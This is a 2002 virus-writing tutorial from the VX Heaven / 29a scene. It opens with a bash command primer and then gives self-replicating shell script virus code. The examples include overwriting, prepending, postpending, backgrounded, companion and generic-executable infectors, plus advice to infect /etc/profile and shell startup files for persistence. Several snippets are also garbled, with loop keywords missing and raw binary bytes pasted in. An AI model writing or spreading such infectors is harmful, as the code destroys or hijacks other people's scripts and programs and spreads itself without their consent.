VX Heaven


Virus Juice: squeezing bash to get it, another little shell script virus tutorial

29a [6]
March 2002


1. General introduction

1.1. Presentation

This tutorial is intended to give a general perspective on script viruses in UNIX environments, and to show some examples of what can be done with the techniques it explains.

Many tutorials already cover this topic, so this text is not new in that respect, but I thought it worth writing in order to give the topic a more global focus and to show my examples in detail.

To finish this introduction I would like to emphasize the work of SnakeByte and Gobleen Warrior in this field. I didn't know there were more people interested in this funny type of script :-)

1.2. Shell scripting

Let's start from the basics: what is a shell script? As the name says, a shell script is a program interpreted by the shell. A shell is a command interface that interprets the commands entered by the user and executes them.

Every operating system has its own shell or command interpreter: you can find cmd.exe in Windows NT, command.com in Windows 9x, and a wide variety in the UNIX family, such as sh, csh, ksh...

Shell scripts are used to write small programs that will be run very frequently, saving us from typing the same commands every time we want to repeat an action. This is called batch processing: the system executes all the actions listed in the script without the user's intervention.

Scripts are used in UNIX for almost everything: running daemons, configuring programs, enabling services... This is due to the ease of script programming and the power of UNIX shells.

All this is why shell script viruses have an important space in UNIX systems where to reside, even their detection is almost trivial and their infection methods are rudimentary, as I will explain later on.

1.3. Shell script virus, scope

The first question that comes to mind is: do shell script viruses make sense at all? To what extent are they more than a mere hobby?

In my opinion, shell script viruses are not a real threat to UNIX systems. Any system administrator with common sense should be able to handle them without difficulty. On the other hand, with the new popularity that Linux, FreeBSD and other UNIX-like systems for PCs are gaining, shell scripts are being used by inexperienced users who don't know much about what they are doing. In a situation like this, a shell script virus could live without being detected, although it is true that it will hardly infect other systems.

Shell script viruses have a handicap in common with other UNIX viruses: it is not usual for users to exchange executable files. Files are usually distributed with their source code, and in the case of scripts, they are edited to suit the needs of the machine in question.

So I would like to say that I consider this kind of virus an entertainment, a way of experimenting and satisfying my own curiosity, and not a real virus that can stand up to antivirus programs and advanced users. I started with this in my UNIX class, where we did not have much to do and spent many hours in front of a shell. This helped me to gain some knowledge and experience of shell scripting :-)

2. Shells in UNIX

2.1. Potentialities and compatibilities of the different shells

Unlike other operating systems, UNIX has many different shells; each of them is aimed at certain environments, and their syntaxes are similar but not identical.

Because of this, it is very common to include a line at the beginning of every shell script that selects the shell which will execute the script, to avoid misunderstandings.

#!/bin/sh
echo Hello, world!

As we can see, we use a special comment (comments start with a # and finish at the end of the line) to indicate where the chosen shell is located. If we leave that line out the script will execute anyway, but if it uses commands specific to that shell, omitting the line could be a disaster.

Every shell is "strong" in the area it was designed for: sh is quite unpleasant for interactive work, but it is very powerful for scripting. Ksh (Korn Shell) is intended to be more user friendly and is the standard shell in many UNIX systems (e.g. Solaris). Csh and its newer version, tcsh, are another common family of UNIX shells. There are many others, each one centered on a different characteristic (speed, size, etc.).

In this tutorial we will concentrate on the most widespread shell, sh or bash (Bourne Again Shell), because it is present in every UNIX system.

2.2. sh and bash, a de facto standard

Bash is a new implementation of Stephen Bourne's shell, the Bourne Shell. Thanks to its power, and because it has been absorbing the capabilities of other shells, it has been gaining ground in the world of shells until becoming a de facto standard, that is, a standard by virtue of its widespread use.

Scripts written for bash usually have the .sh extension, although system scripts don't follow this rule.

In Linux systems /bin/sh is usually a symbolic link to /bin/bash, so there is no difference between them, but in other UNIX systems there are differences with regard to sh, bash and bash2's capability, so this is something to take into account when trying to program in a compatible way.

2.2.1. Bash thoroughly and usual commands

There are many structures, expressions and built-ins in the bash shell which help in writing complex and powerful scripts, but which can confuse the programmer.

For an exhaustive use of bash I recommend the "Advanced Bash-Scripting Guide: A complete guide to shell scripting, using bash", which can be found at in the "Guides" section.

In this chapter of this tutorial I will only explain those bash particularities that we will need to write our shell script viruses. I recommend reading it at the end, as we need a more detailed explanation about the commands and expressions used in the scripts, so please, go to the next chapter ;-)

The "cut" command

The "cut" command is used for getting different fields from the lines of a file. The most usual way of using it is defining a character as a field separator and a field number, for example:

/etc/passwd file:



$> cat /etc/passwd | cut -d":" -f3

we will get the UID of "zert" (1001) because we are defining ":" as a field separator (-d":") and we are requesting the third field (-f3).

With "cut" we can do many other things, but they are not interesting for this tutorial, so if you want to know something more about this command, you know what to do, "man cut" ;-)
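As a small sketch of the field extraction described above, the following works on a single passwd-style line held in a variable. The sample entry is made up for illustration; only the login "zert" and the UID 1001 come from the text.

```shell
#!/bin/sh
# Hypothetical passwd-style entry; only "zert" and UID 1001 come from the text.
entry='zert:x:1001:100:Example User:/home/zert:/bin/sh'

# -d sets the field separator, -f selects the field number(s).
uid=$(printf '%s\n' "$entry" | cut -d: -f3)
login_and_shell=$(printf '%s\n' "$entry" | cut -d: -f1,7)

echo "$uid"               # third field
echo "$login_and_shell"   # fields 1 and 7, still joined by ":"
```

When several fields are requested, "cut" keeps the original separator between them.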

The "head" command

With the "head" command we request the first part of a file. We can request a specific number of characters or even a specific number of lines, for example:

$> head -5 /etc/passwd 

gives us the first 5 lines of the file "/etc/passwd".


$> head -c512 /etc/passwd

we get the first 512 characters of "/etc/passwd".

In this tutorial we usually use "head" in combination with "$0" to copy the first lines of the current file into the host.

If you want to know more about this command, "man head" ;-)
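The two forms of "head" can be tried on a scratch file, as in this minimal sketch. The file and its contents are assumptions made for the example, and "-c" is supported by the GNU and BSD versions of "head" rather than by every historical UNIX.

```shell
#!/bin/sh
# Build a small scratch file so the example does not depend on system files.
sample=$(mktemp)
printf 'line1\nline2\nline3\nline4\n' > "$sample"

first_two=$(head -n 2 "$sample")    # first two lines
first_five=$(head -c 5 "$sample")   # first five bytes

echo "$first_two"
echo "$first_five"
rm -f "$sample"
```

"head -n 2" is the current spelling of the older "head -2" form used in this tutorial.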

Redirecting the output

Bash allows redirecting the standard output (stdout) as well as the standard error output (stderr) to other files. We use ">" to redirect standard output and "2>" to do the same with the standard error output.

Something very usual in shell scripts is redirecting the standard output as well as the standard error output to the same file. Here is an example of how to do it:

$> cat * > currentdir 2>&1

The order matters. Redirections are processed from left to right, so the following is not equivalent: it points stderr at wherever stdout currently goes (usually the terminal) and only then sends stdout to the file.

$> cat * 2>&1 > currentdir

Again, check out the manual pages for more info ("man bash").
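The effect of the order of redirections can be checked with a short sketch like this one. The "noisy" function and the temporary log file are hypothetical names introduced only for the example.

```shell
#!/bin/sh
# A command that writes one line to stdout and one line to stderr.
noisy() { echo "to stdout"; echo "to stderr" >&2; }

log=$(mktemp)

# stdout is sent to the file first, then stderr is pointed at the same place:
# both lines end up in the file.
noisy > "$log" 2>&1
both=$(wc -l < "$log" | tr -d ' ')

# stderr is duplicated from the current stdout (here the command
# substitution) and only then is stdout moved to the file.
leaked=$(noisy 2>&1 > "$log")
only_stdout=$(wc -l < "$log" | tr -d ' ')

echo "$both $only_stdout $leaked"
rm -f "$log"
```

In the second call the file receives only the stdout line, and the stderr line escapes to whatever stdout was before the redirection.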

The "if" structure

In Bash the "if" structure has some peculiarities compared with other programming languages. Let's see its syntax:

if list; then list; [ elif list; then list; ] ... [ else list; ] fi

First, the first "list" of commands is executed. If its exit status is zero (as after an "exit 0"), the "then" list is executed. Otherwise each "elif" list is executed in turn, and if one of them returns zero its "then" list is executed and the structure finishes. Finally, if no list returned zero, the "else" list is executed.

So, "if" does not need an expression; it can take a list of commands or any of the conditions that "test" (also written "[ ... ]") provides for handling files, strings or numeric arguments:

  1. file conditions:
    -a file              True if "file" exists.
    -b file              True if "file" exists and is a block special file.
    -c file              True if "file" exists and is a character special file.
    -d file              True if "file" exists and is a directory.
    -e file              True if "file" exists.
    -f file              True if "file" exists and is a regular file.
    -g file              True if "file" exists and its "set-group-id" bit is set.
    -h file              True if "file" exists and is a symbolic link.
    -k file              True if "file" exists and its "sticky" bit is set.
    -p file              True if "file" exists and is a named pipe (FIFO).
    -r file              True if "file" exists and can be read.
    -s file              True if "file" exists and its size is greater than zero.
    -t fd                True if "fd" is open and refers to a terminal.
    -u file              True if "file" exists and its "set-user-id" bit is set.
    -w file              True if "file" exists and is writable.
    -x file              True if "file" exists and is executable.
    -O file              True if "file" exists and belongs to the effective current user.
    -G file              True if "file" exists and belongs to the effective current group.
    -L file              True if "file" exists and is a symbolic link.
    -S file              True if "file" exists and is a socket.
    -N file              True if "file" exists and has been modified since it was last read.
    file1 -nt file2      True if "file1" is newer than "file2".
    file1 -ot file2      True if "file1" is older than "file2".
  2. string conditions:
    -z string            True if the length of "string" is zero.
    -n string            True if the length of "string" is not zero.
    string1 == string2   True if both strings are equal. "=" can be used instead of "==".
    string1 != string2   True if the strings are different.
    string1 < string2    True if "string1" sorts lexicographically before "string2".
    string1 > string2    True if "string2" sorts lexicographically before "string1".
  3. numeric argument conditions:
    arg1 -eq arg2        True if the arguments are equal.
    arg1 -ne arg2        True if the arguments are different.
    arg1 -lt arg2        True if "arg1" is lower than "arg2".
    arg1 -le arg2        True if "arg1" is lower than or equal to "arg2".
    arg1 -gt arg2        True if "arg1" is greater than "arg2".
    arg1 -ge arg2        True if "arg1" is greater than or equal to "arg2".
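A few of the conditions listed above can be combined in an "if ... elif ... else" chain, as in this minimal sketch. The "classify" function and the scratch directory are hypothetical and exist only for the example.

```shell
#!/bin/sh
# classify PATHNAME: print a one-word description using "test" conditions.
classify() {
    if [ -d "$1" ]; then
        echo directory
    elif [ -f "$1" ] && [ -s "$1" ]; then
        echo non-empty-file
    elif [ -f "$1" ]; then
        echo empty-file
    else
        echo missing
    fi
}

scratch=$(mktemp -d)
: > "$scratch/empty"          # create a zero-length file
echo data > "$scratch/full"   # create a file with content

r_dir=$(classify "$scratch")
r_empty=$(classify "$scratch/empty")
r_full=$(classify "$scratch/full")
r_none=$(classify "$scratch/nope")
echo "$r_dir $r_empty $r_full $r_none"
rm -rf "$scratch"
```

Quoting "$1" keeps the tests working when a name contains spaces.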
The "for" structure

The "for" structure in Bash is also a little bit special, and much more powerful than in most programming languages. Its syntax is like this:

for name [ in word ] ; do list ; done

It first expands the "word" list, which is a list of strings separated by whitespace. Then the "name" variable is assigned the first element of the "word" list and the "list" of commands is executed. It keeps doing the same for all the elements in "word".

If the "word" list is empty nothing is executed and the return value is zero. If it is not empty, the return value is that of the last command executed.

As we can see, this does not have much to do with the typical C or Pascal "for", but we can build similar structures using the "seq" command:

for I in $(seq 1 10)
do
        echo $I
done

This will print 10 lines with the numbers from 1 to 10, because "seq" generates sequences of natural numbers from 1 to the given parameter, or between the given limits ("seq 5 10" generates the numbers from 5 to 10).
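The two shapes of the "for" syntax, with and without the "in word" part, can be sketched as follows. The variable names are chosen only for the example.

```shell
#!/bin/sh
# Sum the numbers 1..10 with a word-list "for" driven by seq.
total=0
for i in $(seq 1 10)
do
    total=$((total + i))
done
echo "$total"

# Without the "in word" part, "for" walks the positional parameters.
set -- alpha beta gamma
joined=
for arg
do
    joined="$joined<$arg>"
done
echo "$joined"
```

The second loop is the reason "in word" appears in brackets in the syntax line: leaving it out makes the loop iterate over "$@".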

The "tr" command

This command is used for translating or deleting characters in a string. It usually receives two parameters, a list of characters and the list of their translations, for example:

$> echo zert | tr aeiou uoiea

will show "zort" because the "e" from the first list corresponds to the "o" of the second list.

If what we want to do is delete characters we have to use the "-d" option, let's see it in an example:

$> cat /etc/passwd | tr -d a

will show /etc/passwd omitting all the "a"s.
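A few more uses of "tr" on short strings, as a sketch. The input words are arbitrary, and "-s" (squeeze repeated characters) is an option not mentioned in the text above.

```shell
#!/bin/sh
# Translate a range of characters: lower case to upper case.
upper=$(echo zert | tr 'a-z' 'A-Z')

# Delete every vowel.
no_vowels=$(echo tutorial | tr -d aeiou)

# Squeeze runs of spaces into a single space.
squeezed=$(echo 'a    b   c' | tr -s ' ')

echo "$upper $no_vowels $squeezed"
```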

The "source" clause

Just as other programming languages let us include source code that lives in other files ("#include" in C or "Uses" in Pascal, for example), in bash scripting we can do the same with the "source" clause.

If we had code in a file named "generic", for example, and we wanted to include it in our script, we would just have to do this:


source generic

# our code...

We can also use the compact version of the "source" clause, the ".":


. generic

# our code...
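To see the inclusion at work, this sketch writes a tiny library to a temporary file and then reads it into the current shell. The library contents, the "greet" function and the GREETING variable are all hypothetical.

```shell
#!/bin/sh
# Create a small library file to include.
lib=$(mktemp)
cat > "$lib" <<'EOF'
GREETING="hello"
greet() { echo "$GREETING, $1"; }
EOF

# "." is the portable spelling; bash also accepts "source".
. "$lib"

# Variables and functions from the file now exist in this shell.
msg=$(greet world)
echo "$msg"
rm -f "$lib"
```

Because the file is read into the current shell rather than run as a separate process, its definitions remain available after the "." line.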
Background execution

As we all know, in a UNIX system there are many processes running in the background without interfering with the user. In bash scripting we can send commands to the background without having to wait for them to finish.

To do that it's enough to put a "&" character at the end of the command and it will be executed in the background. With the "fg" and "bg" commands we control what is in the foreground and the background.

Another possibility is to launch lists of commands in parallel, with the help of parentheses, and synchronize them with "wait". Let's see it in an example:

(find / -name passwd; echo got it!) &
(seq 65355) &
wait

For sure, the output of "find" and the output of "seq" will mix together because they are running concurrently, but with "wait" we can be sure that from that point on there is only one thread of execution.
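The synchronization with "wait" can be observed with two short background jobs that write to separate files. This is a sketch; the scratch directory and file names are assumptions made for the example.

```shell
#!/bin/sh
out=$(mktemp -d)

# Two command lists started in parallel, each in its own subshell.
( sleep 1; echo slow > "$out/a" ) &
( echo fast > "$out/b" ) &

# Block until every background job of this shell has finished.
wait

# Both files are guaranteed to exist from this point on.
a=$(cat "$out/a")
b=$(cat "$out/b")
echo "$a $b"
rm -rf "$out"
```

Without the "wait" line, the script could try to read "$out/a" before the slower job had written it.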

The "grep" command

With the "grep" command we can find the lines in a file that match a pattern. It can show the lines that match a given regular expression, the context around those lines, or all the lines except those.

Let's see how to do it in some examples:

$> grep '#!/bin/sh' *

will show all the lines in every file of the current directory (*) that contain the '#!/bin/sh' pattern.

$> grep '[Vv][Ii][Rr][Uu][Ss]' *

will show every line in every file of the current directory (*) which contains the word "virus" in upper case as well as lower case (we use UNIX regular expressions, where [Vv] means "V" or "v"). The pattern is quoted so that the shell does not try to expand the brackets as a file name pattern.

$> grep -v '#!/bin/sh' *

will show every line in every file of the current directory which does not contain the given pattern '#!/bin/sh'.

$> grep -3 '#!/bin/sh' *

will show all the lines in all the files of the current directory (*) that contain the '#!/bin/sh' pattern, as well as the 3 lines before and the 3 lines after each match.
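The same kinds of search can be tried on a scratch file, as sketched here. The file contents are made up, and "-i" (ignore case) and "-c" (count matching lines) are options not covered in the text above; "-i" is a shorter alternative to writing [Bb][Ee][Tt][Aa].

```shell
#!/bin/sh
f=$(mktemp)
printf 'alpha\nBeta\ngamma\nbeta test\n' > "$f"

# Case-insensitive match.
ci=$(grep -i 'beta' "$f")

# Inverted match: every line that does NOT contain the pattern.
inv=$(grep -v -i 'beta' "$f")

# Count the lines ending in "a" ("$" anchors the end of the line).
count=$(grep -c 'a$' "$f")

echo "$ci"
echo "$inv"
echo "$count"
rm -f "$f"
```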

The "find" command

This command is used to search for files in the directory tree. We can specify many file properties such as name, permissions, date, owner, etc. Its use is very easy: we decide where we want to start the search and what properties our targets have, for example:

$> find /etc/ -perm /111

will show us every file under the "/etc/" directory that has any execute permission bit set. (Older versions of GNU find wrote this test as "-perm +111"; current versions use "/".)

There are many options in the "find" command, so I recommend taking a look at the manual pages ("man find").
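Searching by name and by type can be sketched on a small scratch tree. The directory layout and file names here are assumptions made for the example.

```shell
#!/bin/sh
d=$(mktemp -d)
mkdir "$d/sub"
: > "$d/a.txt"
: > "$d/sub/b.txt"
: > "$d/sub/c.log"

# Regular files whose name matches a quoted glob pattern.
txt=$(cd "$d" && find . -type f -name '*.txt' | sort)

# Directories only, including the starting point itself.
dirs=$(cd "$d" && find . -type d | sort)

echo "$txt"
echo "$dirs"
rm -rf "$d"
```

The pattern given to "-name" is quoted so that "find", not the shell, does the matching in every subdirectory.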

The "tee" command

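This command reads from the standard input and writes to the standard output and to any files given as arguments. It's commonly used to redirect a file to itself, avoiding error messages. Bear in mind that in the pipelines below the shell truncates the output file when the pipeline starts, so what "cat" manages to read from it depends on timing. Let's see an example: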

me@localhost:~$ touch 1
me@localhost:~$ touch 2
me@localhost:~$ cat 1 2 > 1
cat: 1: input file is output file
me@localhost:~$ cat 1 2 | tee > 1
me@localhost:~$ echo 1 > 1
me@localhost:~$ echo 2 > 2
me@localhost:~$ cat 1 2 | tee > 1
me@localhost:~$ cat 1
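The more usual job of "tee", copying a stream to a file while still passing it on, can be sketched like this. The temporary file is an assumption made for the example.

```shell
#!/bin/sh
copy=$(mktemp)

# tee writes its input both to the named file and to its own stdout.
shown=$(printf 'one\ntwo\n' | tee "$copy")
saved=$(cat "$copy")

echo "$shown"
rm -f "$copy"
```

Here the file is passed to "tee" as an argument, so the same data ends up in both places.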
The "AND list" and the "OR list"

To avoid the repeated use of the "if" structure, the "AND list" and the "OR list" are often used. The following examples show the equivalences between these and the "if" structure:

[ -d $FILE ] && cd $FILE

is the same as

if [ -d $FILE ]
then
        cd $FILE
fi

and

[ -d $FILE ] || cat $FILE

is the same as

if [ ! -d $FILE ]
then
        cat $FILE
fi

or

if [ -d $FILE ]
then
        :
else
        cat $FILE
fi

where ":" corresponds to the null instruction in shell scripting, equivalent to the NOP used in assembly language.
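Both kinds of list can be combined in a small function, sketched here. The "kind_of" function and the scratch directory are hypothetical.

```shell
#!/bin/sh
# kind_of PATHNAME: print "dir", "file" or "missing".
kind_of() {
    # AND list: the block runs only if the test succeeds.
    [ -d "$1" ] && { echo dir; return; }
    # OR list: the block runs only if the test fails.
    [ -f "$1" ] || { echo missing; return; }
    echo file
}

tmpd=$(mktemp -d)
: > "$tmpd/f"

k1=$(kind_of "$tmpd")
k2=$(kind_of "$tmpd/f")
k3=$(kind_of "$tmpd/none")
echo "$k1 $k2 $k3"
rm -rf "$tmpd"
```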

Command blocks

Another improvement in Bash is the possibility of handling a list of commands as a block, and redirecting its output or its input as a group, for example:

{
        head -15 $0
        echo hello!
        cat ./tmp
} > tmp2

would redirect the result of the three commands in the block to the "tmp2" file. This can help writing clean and tiny scripts.
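Grouped redirection works for input as well as output, as this sketch shows. The report file and its contents are assumptions made for the example.

```shell
#!/bin/sh
report=$(mktemp)

# One redirection collects the output of every command in the block.
{
    echo "header"
    printf '%s\n' one two
    echo "footer"
} > "$report"
lines=$(wc -l < "$report" | tr -d ' ')

# The same idea for input: both "read" calls consume the same file in turn.
{ read -r first; read -r second; } < "$report"

echo "$lines $first $second"
rm -f "$report"
```

Since the braces do not start a subshell in bash, the variables set by "read" are still visible after the block.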

The "printf" command

As well as being a C function, "printf" is a UNIX command that allows a formatted text output. In the examples of this tutorial I have used it to translate hex codes into normal ASCII with "printf \x126", for example, but "printf" is a much more powerful command, as you can see in the info pages ("info printf").
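A minimal sketch of formatted output and character escapes with "printf" follows. It uses the octal escape \047 for the single quote, which is the portable counterpart of the hexadecimal \x27 form accepted by bash; the sample values are arbitrary.

```shell
#!/bin/sh
# Octal 047 is the ASCII code of the single quote character.
quote=$(printf '\047')

# %-5s pads a string to five columns, %03d zero-pads a number to three digits.
line=$(printf '%-5s|%03d' ab 7)

echo "$quote"
echo "$line"
```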

The "file" command

This command tells us about the file type we are handling. It usually tries to guess it by reading file headers, but sometimes can fail.

Look at the manual pages for more info ;-)

String handling in bash

Bash has a powerful group of built-ins for string handling. We can get their length, extract strings from other strings, mix strings, etc.

This kind of expression is not standard across all UNIX shells, so by using them we gain speed but lose compatibility. If we want to do the same in a more standard way it is better to use the "expr" command.

For an extensive use of this type of built-ins I recommend reading "Advanced Bash-Scripting Guide: A complete guide to shell scripting, using bash", written by Mendel Cooper. In this tutorial I will only use "${#STRING}" to get the length of "STRING", which could be done using "expr length $STRING" in a more standard way but calling an external command.
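The built-in and the "expr" ways of measuring a string can be compared in a short sketch. The sample string is arbitrary; the 'expr STRING : REGEX' form is used here as an assumption about portability, since it is specified by POSIX while "expr length" is a GNU extension.

```shell
#!/bin/sh
STRING="shell script"

# Built-in: no external process is started.
len_builtin=${#STRING}

# External command: prints the number of characters matched by the pattern.
len_expr=$(expr "$STRING" : '.*')

# Built-in pattern removal: drop everything from the first space onwards.
first_word=${STRING%% *}

echo "$len_builtin $len_expr $first_word"
```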

The "basename" command

This command allows us to extract the name of the program from a call to the program with a path to the executable file. It's very useful when we need to call the same program from a different place.

For example, if we want to execute a script with this command:


"basename $0" inside the code of "" will return "", substracting the path from the call command.

The "alias" clause

When we use a command very often, one way to perform the same action more easily and quickly is by using aliases. The main idea is to map one complex command to a short, well-known word, for example:

alias findexec="find / -perm /111 2>/dev/null"

Each time we call "findexec" we will really call "find / -perm /111 2>/dev/null", which is much longer and more complex to type.

3. Shell script virus

3.1. Infection techniques

We will see the way our shell script viruses are going to infect, pointing up advantages and disadvantages of using every technique. The syntax particularities and the commands we will be using are explained in the chapter 2.1.1.

3.1.1.- Overwriting

It is, without a doubt, the easiest and worst technique, where our virus destroys the host program by overwriting it, making it useless. In any kind of virus this method should be avoided, but anyways, here are some examples of viruses using overwriting technique.

for F in *
        cp $0 $F

This has an easy explanation. For every file in the directory copies itself ($0) to the file.

If we want to copy it only in other shell scripts we could do a check with "head" or "grep", like I will explain later.

for F in $(grep '#!/bin/sh' * 2>/dev/null | cut -d":" -f1)
        head -5 $0 > $F 2>/dev/null

What we do in this example is copy first 5 lines of this script (head -5 $0) to every file containing the string '#!/bin/sh'.

With $() we execute what is inside the brackets and we substitute the result, thus LIST=$(echo dog cat) would be the same as defining LIST="dog cat".

Notice that we have redirected the standard error output (stderr) to /dev/null (2>/dev/null) to avoid error messages that grep can produce.

With cut we separate the information gotten from grep, using only the string before the ":".

Another important thing is that with this technique we will not have to see if the host file was already infected or not, because it will be overwritten, but this fact has to be taken in account in the other infecting methods.

3.1.2. Prepending

This technique consists on allocating the virus code in the beginning of the host file. With this we can assure that our code is the first thing to be executed, but has the problem that our code is excesively detectable.

Let's see an example of this kind of virus:

for F in *
        if [ "$(head -c9 $F 2>/dev/null)" = "#!/bin/sh" ]
                head -11 $0 > tmp
                cat $F >> tmp
                mv tmp $F

We notice that there is a blank line in the beginning of the script. This will be our (silent) infection mark, because the scripts that start with a blank line will not satisfy the "if" condition.

Once a host is found we copy the virus code into a temporal file and then the hosts code. To finish, we move the temporay file into the original host.

As we can see there is a great disadvantage in using a temporary file, which makes the process slower because it has to access to the disk, it makes us detectable in the system and can cause infraction while sharing the file (imagine that a user from two different consoles executes the virus, it would be executed twice, so both viruses would try to use "tmp", but only one could reach itr objective).

This can be avoided using a little trick. In a shell script, all the contents of a file can be stored in a variable, so if we dump the host into a variable in memory instead of another file will would reach our objective:

for F in *
        if [ "$(head -c9 $F 2>/dev/null)" = "#!/bin/sh" ]
                HOST=$(cat $F|tr '\n' Ç)
                head -11 $0 > $F 2>/dev/null
                echo $HOST | tr Ç '\n' >> $F 2>/dev/null

As it's shown, the variable named HOST contains the host's code so we can avoid using a temporary file. But to do this we have had to use a little trick: as when dumping the host's code into a variable the line jumps are lost, we translate them into another unused character which could be 'Ç', to keep them located. So when dumping back from the file to the file again we will translate those characters into line jumps, getting the original file :-)

Another way of doing a prepending virus is trying not to include our virus' code itself in the beginning of the script. This could take us to think about a "source" or "." clause, which allow to include code from an external file in a single line. But this would separate our virus from the host because the virus code would not be itself in the host's code but in the same directory, and then an infection would not happen in case they are separated.

To avoid this we could use calls to functions inside the shell script code. But functions should be specfied in the beginning of the file, so it would not work. Let's see it with an example:

# ATCHTUNG! This shell script DOESN`T WORK!!!!!
# host code ...
start () {
for F in *
        if [ "$(head -c9 $F 2>/dev/null)" = "#!/bin/sh" ]
                HOST=$(cat $F|tr '\n' Ç)
                head -3 $0 > $F 2>/dev/null
                echo $HOST | tr Ç '\n' >> $F 2>/dev/null
                tail -12 $0 >> $F

This code fails when trying to execute "start" because it is not a valid command and has not been defined yet ;-(

3.1.3. Postpending

By using this technique we put our code at the end of the host file so it is more difficult for it to be detected, but in the other hand, we can not assure its execution (if the host script finishes without arriving at the end of its code because of an abnormal exit or an error, for example).

I personally consider this method the best of the explained ones because we avoid being so explicit by putting the code at the end, and usually scripts execute all their code until the end.

At the programming level is similar to the rest of explained examples:

for F in *
        if [ "$(head -c9 $F 2>/dev/null)" = "#!/bin/sh" -a "$(tail -1 $F 2>/dev/null)" != "# :-P" ]
                tail -8 $0 >> $F 2>/dev/null
# :-P

The most important thing in this example is copying our code at the end of the host file with "tail -8 $0 >> $F 2>/dev/null". Another important point is that we need another infection mark, we can not leave a blank line in the beginning of the file because we will copy our code at the end. That is why we leave a comment (# :-P), so we can detect it in the second part of the "if" ("$(tail -1 $F 2>/dev/null)" != "# :-P").

3.1.4. Residence

When I talk about residence I do not refer to a real residence where the virus is saved into the memory waiting for a shell script to execute and then infect it, and we avoid to be shown in the process list with a LKM (Loadable Kernel Module). In our case of residence is just that our shell script virus stays in background not to delay too much its host's execution.

To do this we will need a temporary file where we will dump our code and then we will invoke it for background execution. Let's see an example:

tail -13 $0 > tmp 2>/dev/null
chmod +x tmp 2>/dev/null
./tmp $0 & 2>/dev/null

exit 0

for F in *
        if [ "$(head -c9 $F 2>/dev/null)" = "#!/bin/sh" ]
                HOST=$(cat $F|tr '\n' \xc7)
                head -5 $1 > $F 2>/dev/null
                echo $HOST | tr \xc7 '\n' | grep -v '#!/bin/sh'>> $F 2>/dev/null
                tail -14 $1 >> $F 2>/dev/null
rm tmp 2>/dev/null

Let's explain this with a little bit of detail... what we do in the beginning is to copy the virus code into a temporary file, give it execution privileges (chmod +x) and execute it in background (&) sending the current script name as a parameter ($0). This parameter will be used later on.

The host's code would go just after this, and to finish, it exits without executing last part (it is already being executed, because we called tmp&).

In the temporary file we have created the last 13 lines of the virus, this is, the typical things:

It is not really necessary to do all this stuff for such a small code, but this technique can be useful when used with viruses which do complex operations, as we will see in the polymorphic viruses.

If our aim is a resident virus expecting the execution of a possible objective, we have to try the infection of the startup scripts (".bash_rc", "bash_profile"...) to be in execution each time user's shell is launched. Optimal example of this idea would be to infect "/etc/profile", because it's accessed each time an user's logon is done :-)

3.1.5. Companion

A companion virus, as means its name, "follows" the host file, with no modification of it. Usually, the main process of this type of infection is to move the host to another file (commonly hidden) and to write the virus code in a file with the original host's name.

This method has a weak side: if somebody moves one of the "companion" files, the infection will be broken and the virus code wouldn't find it's original host file.

This example shows a companion virus to explain practically the idea:

for F in *
        if [ -f $F ] && [ -x $F ] && [ "$(head -c4 $F 2>/dev/null )" == "ELF" ]
                cp $F .$F -a 2>/dev/null
                head -10 $0 > $F 2>/dev/null
./.$(basename $0)

Assuming all shown until this point, this code doesn't need further explanations. The only fact that may be remarcked is that we use "cp -a" instead of "mv" to move the host file. This is done to mantain all file attributes with no modification. Another important thing is to perform accurately the call to the original host file. We must use "basename $0", because if we use simply ".$0" or "./.$0" and we call the host with a command like this:


we are trying to execute the original host file like this: "../host" or "./../host" respectively, which are obviosly wrong.

This code infects ELF executables from a shell script according to the idea show by SnakeByte in a previous article. In next chapter we will be able to code an evolutionated version of this idea with a multipartite or multiplatform virus, which will infect many types of executable files.

3.1.6. Multiplatform

Multiplatform viruses are known for having the possibility of infecting different platforms. The most spectacular cases are when viruses infect different microprocessors (such as Motorola or Intel), performing rare tricks in assembler.

Shell script viruses are, in essence, multiplatform, because they can expand in multiple platforms as far as a shell exists (almost all UNIX flavors have a Bash version). But I'd like to write about other kind of viruses in this document. We will develop a shell script infector capable of infecting any kind of executable file that has a simple call from a shell:

$>/directory/executable -parameters

This is, without the call to an interpreter or similar like in a Perl executable.

Let's analyze our generic executable infector's code. The idea is to copy ourselves at the beginning of the executable, transforming it into a shell script, whatever the type of file it is. After, we launch an infector process in background so the "host"'s execution is not delayed, and then we dump the "host" code into a temporary file and execute it.

        echo 'for F in *'
        echo 'do'
        echo ' if [ -f $F ] && [ -x $F ] && [ "$(head -c3 $F)" != "#;P" ]'
        echo ' then'
        echo ' TAM=$(expr $(cat $F|wc --bytes|tr -d " ") + 1)'
        echo ' cp $F .$F.tmp -a'
        echo ' {'
        echo ' head -27 $1'
        printf " printf 'tail -c'\n"
        echo ' printf "$TAM"'
        printf ' printf \x27 $0 > .$0.exe 2>/dev/null\\n\x27\n'
        printf ' echo \x27 chmod +x .$0.exe 2>/dev/null\x27\n'
        printf ' echo \x27./.$0.exe $*\x27\n'
        printf ' echo \x27rm .$0.exe 2>/dev/null\x27\n'
        echo ' echo exit 0'
        echo ' } > .$F.tmp 2>/dev/null'
        echo ' cat $F >> .$F.tmp'
        echo ' echo >> .$F.tmp'
        echo ' mv .$F.tmp $F'
        echo ' fi'
        echo 'done'
        echo 'rm $0 2>/dev/null'
} > .$0.inf 2>/dev/null
sh ./.$0.inf $0 &
tail -c716 $0 > .$0.exe 2>/dev/null
chmod +x .$0.exe 2>/dev/null
./.$0.exe $*
rm .$0.exe 2>/dev/null
exit 0
^@^@^@^@^@^@^@4^@ ^@^B^@(^@^G^@^D^@^A^@^@^@^@^@^@^@^@\x80^D^H^@\x80
^D^H\xa0\x90^D^H^@^@^@^@^@^@^@^@^F^@^@^@^@^P^@^@Hello, world!
^@^@^@^D^@^@^@^P^@^@^@  ^@^@^@^C^@^@^@^@^@^@^@^@^@^@^@\xa4^B^@^@'

The first line is our infection mark ("#;P", ;P). After we have a block of "echo"'s and "printf"'s that generate the infector process in "hostname.inf", and execute it in background. The rest of the code lines are for copying the last 716 bytes of the file and reconstruct the "host" in "hostname.exe". After that, we call this file with the requested parameters ("$*") and the we delete it.

[ NOTE: probably the code inserted here will not work, because we are converting a binary ELF file into ASCII mode. If you want to try the functional version of "", look at the tarball included ;-) ]

The temporary files' names are taken from the from the original file, so other infected files are not executed at the same time and write into the same temporary file.

To create an effective infector process we have to avoid that the variables are interpreted by the shell ("$0", "$TAM"). To do this we generate simple quotations by using the "printf" command ("printf '\x27'"), generating the following code:


for F in *
        if [ -f $F ] && [ -x $F ] && [ "$(head -c3 $F)" != "#;P" ]
                TAM=$(expr $(cat $F|wc --bytes|tr -d " ") + 1)
                cp $F .$F.tmp -a
                        head -27 $1
